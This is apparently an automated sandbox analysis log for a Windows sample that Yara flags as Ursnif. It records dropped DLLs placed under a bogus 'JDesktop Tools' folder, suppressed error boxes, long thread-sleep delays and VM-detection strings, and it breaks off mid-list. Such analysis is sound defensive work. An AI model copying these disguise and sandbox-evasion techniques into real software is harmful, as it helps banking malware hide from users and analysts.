Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_03BCFF1C push eax; retn 0006h	0_3_03BCFF1D
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_03BCFF1C push eax; retn 0006h	0_3_03BCFF1D
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_03BCFF1C push eax; retn 0006h	0_3_03BCFF1D
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_03BCFF1C push eax; retn 0006h	0_3_03BCFF1D
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_015E6090 push FFFFFFB2h; ret	0_3_015E616D
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_015EA480 pushad ; ret	0_3_015EA481
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_015DB03B push FFFFFF96h; ret	0_3_015DB265
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_015EA2AA pushad ; ret	0_3_015EA2C1
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CEAC00 push ecx; ret	17_2_02CEAC09
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CEE62F push edi; retf	17_2_02CEE630
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CEAFAF push ecx; ret	17_2_02CEAFBF
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CEE9AC push 0B565A71h; ret	17_2_02CEE9B1
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_00385731 push ecx; ret	17_2_00385744

Source: shi1C.tmp.0.dr	Static PE information: section name: .wpp_sf
Source: shi1C.tmp.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_001A1264 LoadLibraryA,GetProcAddress,

17_2_001A1264

Source: decoder.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x378b8
Source: lcms-5.0.dll.4.dr	Static PE information: real checksum: 0x4a44af should be: 0x4c891f
Source: lcms-5.0.dll.0.dr	Static PE information: real checksum: 0x4a44af should be: 0x4c891f
Source: jXzrIReInY.exe	Static PE information: real checksum: 0x7889d0 should be: 0x786e21

Source: shi1C.tmp.0.dr

Static PE information: 0x72F9C735 [Sun Feb 16 01:34:45 2031 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.27378716859

Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ml			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ml			Jump to dropped file

Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\libeay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Local\Temp\shi1C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ssleay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\decoder.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\lcms-5.0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA6F5.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\icuio58.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA368.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\lcms-5.0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Local\Temp\MSI1B4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Microsoft.Azure.KeyVault.Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4D2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Delimon.Win32.IO.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9CCF.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\plcd-player.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA5CB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA23E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\AWSSDK.SimpleDB.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ICSharpCode.SharpZipLib.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\SslCertBinding.Net.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\icuio58.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA463.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\libeay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ssleay32.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9CCF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA5CB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA6F5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA23E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA368.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA463.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\CrashRpt License.txt	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\CrashRpt License.txt	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000011.00000002.530869037.0000000003BA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.2ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.530777240.00000000035F9000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\jXzrIReInY.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\jXzrIReInY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\jXzrIReInY.exe TID: 7100	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe TID: 6676	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe TID: 1404	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe TID: 2192	Thread sleep count: 33 > 30	Jump to behavior

Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\libeay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi1C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ssleay32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA5CB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA23E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\AWSSDK.SimpleDB.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ICSharpCode.SharpZipLib.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\icuio58.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\SslCertBinding.Net.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA368.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\icuio58.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Microsoft.Azure.KeyVault.Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Delimon.Win32.IO.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\libeay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ssleay32.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Thread delayed: delay time: 240000

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Thread delayed: delay time: 240000			Jump to behavior

Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: MSIA463.tmp.4.dr	Binary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: jXzrIReInY.exe, jXzrIReInY.exe, 00000000.00000003.348852801.00000000015DB000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.349301089.00000000015DF000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.304222076.00000000015DA000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000002.351250737.0000000003B7F000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.349152083.00000000015FE000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.266915772.0000000001612000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.349183450.0000000001603000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.348127021.0000000003B71000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.349121259.00000000015DE000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000002.350825569.0000000001613000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000002.350733762.00000000015E1000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.304259450.00000000015FE000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.348370669.00000000015DB000.00000004.00000001.sdmp, jXzrIReInY.exe, 